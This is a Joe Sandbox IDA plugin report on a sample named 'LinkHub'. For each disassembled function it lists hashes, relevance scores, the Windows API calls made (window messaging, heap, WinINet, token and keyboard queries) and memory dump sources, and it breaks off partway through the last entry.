Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: fa058d8cecd106c6d2ab46ce7dc47276dfd40412060412cee74aecbd9c5662c7
Instruction ID: f91c17d0894744dd5434feaffada57eafe0d48fe5eec3cf7a8eb65dcc5a73b48
Opcode Fuzzy Hash: fa058d8cecd106c6d2ab46ce7dc47276dfd40412060412cee74aecbd9c5662c7
Instruction Fuzzy Hash: DD512D35604205DFCB05EF64C4859ADBBF0FF09314B1981E9E81AAB762DB31ED85CB91

Function 00B975AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00B9766B
SetWindowLongW.USER32(?,000000EC,?), ref: 00B97682
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00B976AB
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00B7B5BE,00000000,00000000), ref: 00B976D0
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00B976FF

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: b9654c06051e7b6c1e7c5e5b4302255204f9b228478d001b1666d296dba4d8b7
Instruction ID: f07cb824ccdc6743bf3ae352aa709bb568b0c3e1a1ae7a25a30c4c1e8cc850e0
Opcode Fuzzy Hash: b9654c06051e7b6c1e7c5e5b4302255204f9b228478d001b1666d296dba4d8b7
Instruction Fuzzy Hash: 6741F135A98504AFCB24CF6CCC88FA97BE5EB0A350F1502B5F818A72E0DB70AD00DA50

Function 00B323C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00B32433
_free.LIBCMT ref: 00B32453

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f9737b74b4717bdf91ccb6e150149bc1d488517e18636af7e61085b964dccba6
Instruction ID: ae8f27674beb1a1a6b663767a92d1d7ae65f3206853546753a221216875493b0
Opcode Fuzzy Hash: f9737b74b4717bdf91ccb6e150149bc1d488517e18636af7e61085b964dccba6
Instruction Fuzzy Hash: 6641BF36A00210AFDB24DF78C981A5EB7E5EF89714F2545E9EA15EB391DB31ED01CB80

Function 00B019CD Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00B019E1
ScreenToClient.USER32(00000000,?), ref: 00B019FE
GetAsyncKeyState.USER32(00000001), ref: 00B01A23
GetAsyncKeyState.USER32(00000002), ref: 00B01A3D

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: c0ac5f149b666eb26577d56d714236699f2964fccb0fde93273cacc75d92e54a
Instruction ID: 2dbeb04d99c3f060f2425544fbeaeb97e93c5e6a8603cda40d7d475ea485e9b4
Opcode Fuzzy Hash: c0ac5f149b666eb26577d56d714236699f2964fccb0fde93273cacc75d92e54a
Instruction Fuzzy Hash: 3A41507160410AAEDF199F68C884BEDBBF4FF05724F248656E429A32D0C7346A54DB51

Function 00B742B9 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00B74310
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00B74367
TranslateMessage.USER32(?), ref: 00B74390
DispatchMessageW.USER32(?), ref: 00B7439A
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B743AB

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 9bc92ff34ec775d3f4a81ef9da67cf69edcbdbb3ed8b2e5f8cd13da4ec993136
Instruction ID: c6736f8d107af996ad3a30cf3f3a3ccf9189b5b9d9d989f3537b7d72cc4b9591
Opcode Fuzzy Hash: 9bc92ff34ec775d3f4a81ef9da67cf69edcbdbb3ed8b2e5f8cd13da4ec993136
Instruction Fuzzy Hash: A631E870505381DEEB35CB74D958BB67BE8EB10306F0585FAE47E831A0EB689845CB19

Function 00B6224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00B62262
PostMessageW.USER32(00000001,00000201,00000001), ref: 00B6230E
Sleep.KERNEL32(00000000,?,?,?), ref: 00B62316
PostMessageW.USER32(00000001,00000202,00000000), ref: 00B62327
Sleep.KERNEL32(00000000,?,?,?,?), ref: 00B6232F

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: ed9274887a2135b83809173f940e0991ca531ae9fd2515a5cc293bd65e63ca76
Instruction ID: d33d938e149637c5a46547aaf7d6258257602bf1d52733854d593ad8a9a6167c
Opcode Fuzzy Hash: ed9274887a2135b83809173f940e0991ca531ae9fd2515a5cc293bd65e63ca76
Instruction Fuzzy Hash: 9831C072900219EFEB14CFA8CD89ADE3BB5EB04315F104269FA25AB2D1C774A944DB90

Function 00B7D95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00B7CC63,00000000), ref: 00B7D97D
InternetReadFile.WININET(?,00000000,?,?), ref: 00B7D9B4
GetLastError.KERNEL32(?,00000000,?,?,?,00B7CC63,00000000), ref: 00B7D9F9
SetEvent.KERNEL32(?,?,00000000,?,?,?,00B7CC63,00000000), ref: 00B7DA0D
SetEvent.KERNEL32(?,?,00000000,?,?,?,00B7CC63,00000000), ref: 00B7DA37

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 86adbff425b8d51c2996817cd7e161635574aefb43a5b64de1a39c725b3be6f8
Instruction ID: 34038b3009e96993944d9de5b76f4a26cbf7f594785854bfae36d274cbfbf46e
Opcode Fuzzy Hash: 86adbff425b8d51c2996817cd7e161635574aefb43a5b64de1a39c725b3be6f8
Instruction Fuzzy Hash: 4C314F71504205EFDB20DFA6D984AAAB7F8EF04390B1084AEF65AD3150DB30EE40DB60

Function 00B961A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B961E4
SendMessageW.USER32(?,00001074,?,00000001), ref: 00B9623C
_wcslen.LIBCMT ref: 00B9624E
_wcslen.LIBCMT ref: 00B96259
SendMessageW.USER32(?,00001002,00000000,?), ref: 00B962B5

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 2cb38109f3057ea28ebd37a68a3ee9c4f1b8ef4ca27d8048c6e35ca704091b06
Instruction ID: be38f9633238d679c64f7c40b1a8f55f9d093dd55e5e990e6a4090645143b65a
Opcode Fuzzy Hash: 2cb38109f3057ea28ebd37a68a3ee9c4f1b8ef4ca27d8048c6e35ca704091b06
Instruction Fuzzy Hash: 2F21A2319002189BDF219FA4CC84AEEBBF9FF04360F1042A6F925EB184D7709985CF50

Function 00B8138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00B813AE
GetForegroundWindow.USER32 ref: 00B813C5
GetDC.USER32(00000000), ref: 00B81401
GetPixel.GDI32(00000000,?,00000003), ref: 00B8140D
ReleaseDC.USER32(00000000,00000003), ref: 00B81445

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 175350c35109f7539dffa592f2b4b13d9b518b83c5e68fd6f2c1de34ef05d163
Instruction ID: 2f88784969c2ffdb43855b7b8643672afafc743934bdf5507336dccc289a588f
Opcode Fuzzy Hash: 175350c35109f7539dffa592f2b4b13d9b518b83c5e68fd6f2c1de34ef05d163
Instruction Fuzzy Hash: 5B216336600214AFD704EF65D984A9EBBF9EF58340B0484A9F85AD7761CB30ED04CB90

Function 00B3D13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00B3D146
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B3D169

Part of subcall function 00B33B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B20165,?,?,00B711D9,0000FFFF), ref: 00B33BC5

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B3D18F
_free.LIBCMT ref: 00B3D1A2
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B3D1B1

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 0deb7516be84e3fa04e4e25587d6755293f22779558f5ef35846daf448c522fc
Instruction ID: 2212035c582f5ec9c989b79401c15b16efb9ed3434aea3c7d84ec3dd1b6b959c
Opcode Fuzzy Hash: 0deb7516be84e3fa04e4e25587d6755293f22779558f5ef35846daf448c522fc
Instruction Fuzzy Hash: 3B018476605A157F3321677B6C8CD7B7AEDEEC2B6173501AAFD04E7244DE608D0181B0

Function 00B66078 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00B6608D
_memcmp.LIBVCRUNTIME ref: 00B660AB
_memcmp.LIBVCRUNTIME ref: 00B660BE
_memcmp.LIBVCRUNTIME ref: 00B660D6
_memcmp.LIBVCRUNTIME ref: 00B660EE

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 02b4b41d3a9b2ffd32239ff4faabc3ce6e8874fa1989487d53f1fea36a6f0ef2
Instruction ID: 3031845758adc7168403a9bfddb6d53440fa159451ea700d07be8efabce52fa5
Opcode Fuzzy Hash: 02b4b41d3a9b2ffd32239ff4faabc3ce6e8874fa1989487d53f1fea36a6f0ef2
Instruction Fuzzy Hash: 8301B1F26043157B96106624ADC2FAB73DDDEA13A8F0044B1FE0A9A252F776ED10C2A1

Function 00B3316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(74DE2E40,?,?,00B2F64E,00B33BD6,?,?,00B20165,?,?,00B711D9,0000FFFF), ref: 00B33170
_free.LIBCMT ref: 00B331A5
_free.LIBCMT ref: 00B331CC
SetLastError.KERNEL32(00000000), ref: 00B331D9
SetLastError.KERNEL32(00000000), ref: 00B331E2

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: a4dbf8b940cf34062939e7ea2c21abc3cded1e7cbc805846d2e5e8737f606d32
Instruction ID: d8493c1e154508e9f74adb6856dd9436817ea17c2d94319391a4e1d362aa7d6f
Opcode Fuzzy Hash: a4dbf8b940cf34062939e7ea2c21abc3cded1e7cbc805846d2e5e8737f606d32
Instruction Fuzzy Hash: 30012876644E003B96122739AC85E2B36EDEFD5B72F3504F5F915F3191EF21CA014160

Function 00B608FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B60831,80070057,?,?,?,00B60C4E), ref: 00B6091B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B60831,80070057,?,?), ref: 00B60936
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B60831,80070057,?,?), ref: 00B60944
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B60831,80070057,?), ref: 00B60954
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B60831,80070057,?,?), ref: 00B60960

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: ca128ca19ad80aa11ccf26b8ea64b855d23578730503cf3da2cd6be3cb46c8fb
Instruction ID: bd5b94e3da096717cd9c3d16e5a53e383c670414f79ca54686ea30ff23b2254b
Opcode Fuzzy Hash: ca128ca19ad80aa11ccf26b8ea64b855d23578730503cf3da2cd6be3cb46c8fb
Instruction Fuzzy Hash: D101DF72620204AFEB015F5ADD88B9B7AEEEB44792F104165F905E3252DBB4CD008BA0

Function 00B6F292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 00B6F2AE
QueryPerformanceFrequency.KERNEL32(?), ref: 00B6F2BC
Sleep.KERNEL32(00000000), ref: 00B6F2C4
QueryPerformanceCounter.KERNEL32(?), ref: 00B6F2CE
Sleep.KERNEL32 ref: 00B6F30A

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 123a703c40d661115856bcafd2cca89c610a991289fa4ced88e0f4a082f2f789
Instruction ID: a76c62f26181a3c49e578393c3304eb0e8983e225cb2fddbbe7c75b98749e738
Opcode Fuzzy Hash: 123a703c40d661115856bcafd2cca89c610a991289fa4ced88e0f4a082f2f789
Instruction Fuzzy Hash: 88018C71D0162ADBCF00AFB5ED49AEEBBB8FB08700F0004A6E601B3254DF389554CBA5

Function 00B61A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B61A60
GetLastError.KERNEL32(?,00000000,00000000,?,?,00B614E7,?,?,?), ref: 00B61A6C
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B614E7,?,?,?), ref: 00B61A7B
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B614E7,?,?,?), ref: 00B61A82
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B61A99

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: d3fb328809c8f48d099ea9e7707a8e7c2d051031c9ea7b41241211d390330f1f
Instruction ID: a36e2ad6160523020c2493c64465e4090fd266a83f0233afd900de26f6558d0b
Opcode Fuzzy Hash: d3fb328809c8f48d099ea9e7707a8e7c2d051031c9ea7b41241211d390330f1f
Instruction Fuzzy Hash: BA01AFB9602305BFDB114FAADE48E6B3BBEEF883A4B250455F945D3260DE31DC40CA60

Function 00B61900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B61916
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B61922
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B61931
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B61938
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B6194E

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: abc401d11827ef1a432c665e2e061a93d40d0fc4d77cb1c9067337d754c54117
Instruction ID: 79606d5979cc448b76714d48cb1dbb1d00da62898c5b96023814f39c8fa3f5d7
Opcode Fuzzy Hash: abc401d11827ef1a432c665e2e061a93d40d0fc4d77cb1c9067337d754c54117
Instruction Fuzzy Hash: 62F06276100311BBDB210F6ADD5DF5A3BADEF897A1F540415FA45D72A0CE74DC01CA60

Function 00B61960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B61976
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B61982
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B61991
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B61998
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B619AE

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 8aa37107347662c00a4def8ab7cab82aade2737fead8f7164521bf09423049a6
Instruction ID: e555cd9694a87c41597085e795756d36c54fa453eda7f66254d15a03307e321b
Opcode Fuzzy Hash: 8aa37107347662c00a4def8ab7cab82aade2737fead8f7164521bf09423049a6
Instruction Fuzzy Hash: ABF0C276100311BBDB210F69ED58F5B3BADEF893A0F100411FA05D72A0CE30D801CA60

Function 00B70CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,00B70B24,?,00B73D41,?,00000001,00B43AF4,?), ref: 00B70CCB
CloseHandle.KERNEL32(?,?,?,?,00B70B24,?,00B73D41,?,00000001,00B43AF4,?), ref: 00B70CD8
CloseHandle.KERNEL32(?,?,?,?,00B70B24,?,00B73D41,?,00000001,00B43AF4,?), ref: 00B70CE5
CloseHandle.KERNEL32(?,?,?,?,00B70B24,?,00B73D41,?,00000001,00B43AF4,?), ref: 00B70CF2
CloseHandle.KERNEL32(?,?,?,?,00B70B24,?,00B73D41,?,00000001,00B43AF4,?), ref: 00B70CFF
CloseHandle.KERNEL32(?,?,?,?,00B70B24,?,00B73D41,?,00000001,00B43AF4,?), ref: 00B70D0C

Memory Dump Source

